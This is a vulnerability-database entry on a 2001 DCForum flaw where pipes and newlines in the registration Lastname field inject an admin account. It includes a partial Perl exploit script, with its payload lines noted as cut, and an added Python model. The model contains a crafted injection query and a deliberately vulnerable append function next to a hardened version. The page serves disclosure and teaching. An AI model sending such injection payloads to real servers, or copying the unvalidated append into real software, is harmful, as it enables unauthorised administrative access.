Published: 2001-08-14 00:00:00
Revised: 2017-10-09 21:29:46

[Original] DCScripts DCForum versions 2000 and earlier allow a remote attacker to gain additional privileges by inserting pipe symbols (|) and newlines into the last name in the registration form, which will create an extra entry in the registration database.



- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  BUGTRAQ  20010515 DCForum Password File Manipulation Vulnerability (qDefense Advisory Number QDAV-5-2000-2)
(UNKNOWN)  BID  2728
(UNKNOWN)  XF  dcforum-cgi-admin-access(6538)

- Vulnerability information

Critical    Input validation
2001-08-14 00:00:00    2005-05-02 00:00:00

- Advisories and patches

        DC Scripts
        DC Scripts DCForum 2000 1.0:
        DC Scripts Patch 2000

        DC Scripts DCForum 6.0:
        DC Scripts Patch 6.0

- Vulnerability information (20849)

DCForum 6.0 Remote Admin Privilege Compromise Vulnerability (EDBID:20849)
cgi remote
2001-05-08 Verified
0 Franklin DeMatto
N/A

DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.

Affected versions of DCForum are vulnerable to an attack that yields an elevation of privileges and, through the resulting administrative account, remote execution of arbitrary commands.

DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.

When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.

DCForum does not validate this user-supplied account information. An attacker can therefore corrupt the script's user records by supplying a last name that contains URL-encoded pipes and newlines: the newline terminates the attacker's own record, and whatever text follows it is written to the file as a further record. By appending a complete record to the last name field, the attacker inserts account information for a new user of their choosing and sets that user's privilege field to admin.

This newly created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the web server process.


#!/usr/bin/perl
# - (C) 2001 Franklin DeMatto -

use Getopt::Std;
use IO::Socket;

# -a: activate the account afterwards (not implemented)
# -p: store the password in plaintext instead of a crypt() hash (needed when the target runs on NT)
getopts ('ap');

usage () unless ($#ARGV == 0 || $#ARGV == 1);
if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; }

$host = $ARGV[0];
$uri  = $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi';

# The account to be injected as admin, plus a throwaway account that carries the
# registration itself; random suffixes avoid colliding with existing users.
$username  = 'evilhacker' . ( int rand(9899) + 100 );
$password  = int rand(9899) + 100;
$hash      = $opt_p ? $password : crypt ($password, substr ($password, 0, 2));
$dummyuser = 'not' . ( int rand(9899) + 100 );
$dummypass = int rand(9899) + 100;

print "\n(Debugging info: Hash = $hash    Dummyuser = $dummyuser    Dummypass = $dummypass)\n\n";
print "Attempting to register username $username with password $password as admin . . .\n";

$sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n";

# The two request lines that carry the registration fields, with the URL-encoded
# newline and pipe-delimited admin record inside the Lastname value, were cut off
# in the published copy of this exploit and are not reconstructed here.
$req = "GET $uri?";
$req .= "";
$req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012";
$req .= "Host: $host\015\012\015\012";

print $sock $req;

print "The server replied:\n\n";

# Echo the body of the response, stopping at the next form or the end of the body.
while (<$sock>) {
  if (/BODY/) { $in_body = 1; }
  next unless $in_body;
  if (/form|<\/BODY>/) { last; }
  print $_ unless (/^\s*$/);
}
print "\nNote: Even if your password is supposed to be e-mailed to you, it should work right away.\n";

sub usage {
  print <<EOF;
- (C) 2001 Franklin DeMatto - franklin

Usage: $0 [options] host [path to dcboard.cgi]

   -a to activate the account (for sites that do not activate automatically)
  NOTE: This option is not yet supported, but should be quite easy to add if you need it
  -p to leave the password in plaintext (necessary when the target is NT)

The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcboard.cgi

EOF
  exit 1;
}


- Vulnerability information

DCForum dcboard.cgi Arbitrary Admin Account Creation
Location: Remote / Network Access. Attack type: Input Manipulation.
Impact: Loss of Integrity. Solution: Upgrade.
Exploit: Public. Disclosure: Third-party Verified.

- Vulnerability description

DCForum contains a flaw that allows a remote attacker to create an arbitrary administrative account. When a new user is created, the registration input is not sanitized, so an attacker can supply a pipe (|) and arbitrary text shaped like an additional user record, which is then appended to the password file as a separate account.
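The following is an added example, not code from the original advisory or from DCScripts. It is a Python model of the flat-file registration logic that this description and the Bugtraq write-up earlier on the page describe: one record per line, fields separated by pipes, no check on the values. The record layout (username|hash|firstname|lastname|email|role), the SHA-256 stand-in for the stored password hash, the `%0A`/`%7C` payload and the sample records are all constructed for the demonstration; DCForum's real file layout is not given on this page. The vulnerable append turns a crafted Lastname into a second record with the admin role, while the hardened append rejects the same registration before it reaches the file.

```python
import hashlib
import re
from urllib.parse import parse_qs

FIELD_SEP = "|"
RECORD_SEP = "\n"
# Assumed record layout for this model; not DCForum's documented layout.
FIELDS = ("username", "hash", "firstname", "lastname", "email", "role")


def hash_password(password: str) -> str:
    """Stand-in for the crypt(3) hash the forum stores. Any one-way
    function works for the delimiter-injection demonstration."""
    return hashlib.sha256(password.encode()).hexdigest()[:13]


def registration_from_query(query: str) -> dict:
    """Decode the registration form the way the CGI sees it: %0A and %7C
    arrive as a literal newline and pipe inside the Lastname value."""
    q = parse_qs(query, keep_blank_values=True)
    return {
        "username": q["Username"][0],
        "hash": hash_password(q["Password"][0]),
        "firstname": q["Firstname"][0],
        "lastname": q["Lastname"][0],
        "email": q["EMail"][0],
        "role": "user",  # a self-registered account never gets admin legitimately
    }


class DelimiterInjection(ValueError):
    pass


def append_record_vulnerable(userfile: str, rec: dict) -> str:
    """The flaw: values are joined with '|' and terminated with '\\n' with no
    check that a value itself contains either delimiter."""
    return userfile + FIELD_SEP.join(rec[f] for f in FIELDS) + RECORD_SEP


def append_record_fixed(userfile: str, rec: dict) -> str:
    """Same append, but any field carrying a pipe, newline or carriage return
    is rejected outright instead of being written."""
    for name in FIELDS:
        if re.search(r"[|\r\n]", rec[name]):
            raise DelimiterInjection(f"delimiter in {name!r}: {rec[name]!r}")
    return append_record_vulnerable(userfile, rec)


def parse_userfile(userfile: str) -> list:
    """Read the flat file back as the forum would at login time. Extra
    trailing fields on a line are ignored, missing ones are simply absent."""
    return [dict(zip(FIELDS, line.split(FIELD_SEP)))
            for line in userfile.split(RECORD_SEP) if line]


def admins(userfile: str) -> list:
    return [r["username"] for r in parse_userfile(userfile) if r.get("role") == "admin"]


# Constructed attack query: Lastname = "Doe", a newline, then a full record
# claiming the admin role. The trailing "required=" parameter mirrors the
# one visible in the published exploit's request.
ATTACK_QUERY = (
    "Username=not4711&Password=s3cret&Firstname=John"
    "&Lastname=Doe%0Aevilhacker123%7CabC9fLHcMl3yE%7CEvil%7CHacker"
    "%7Cevil%40example.invalid%7Cadmin"
    "&EMail=john%40example.invalid"
    "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail"
)

# Constructed seed file with one legitimate administrator.
SEED_USERFILE = "alice|alQ3cb/Nr5a9c|Alice|Admin|alice@example.invalid|admin\n"


def demo(query: str = ATTACK_QUERY) -> dict:
    rec = registration_from_query(query)
    after_vuln = append_record_vulnerable(SEED_USERFILE, rec)
    try:
        append_record_fixed(SEED_USERFILE, rec)
        rejected = False
    except DelimiterInjection:
        rejected = True
    return {
        "records_after_vulnerable_write": len(parse_userfile(after_vuln)),
        "admins_after_vulnerable_write": admins(after_vuln),
        "fixed_version_rejected": rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Rejecting the registration is preferable to silently stripping the delimiter characters: a stripped value changes what the user actually registered without telling anyone, whereas a rejection leaves a visible trace in the server log. The legitimate record in the vulnerable output also ends up with only four fields, which is the "corruption of the script's user records" the Bugtraq description mentions.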

- Timeline

2001-05-15 Unknown
2001-05-15 Unknown

- Solution

Upgrade to version 6.25 or higher, which has been reported to fix this vulnerability. An upgrade is required, as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete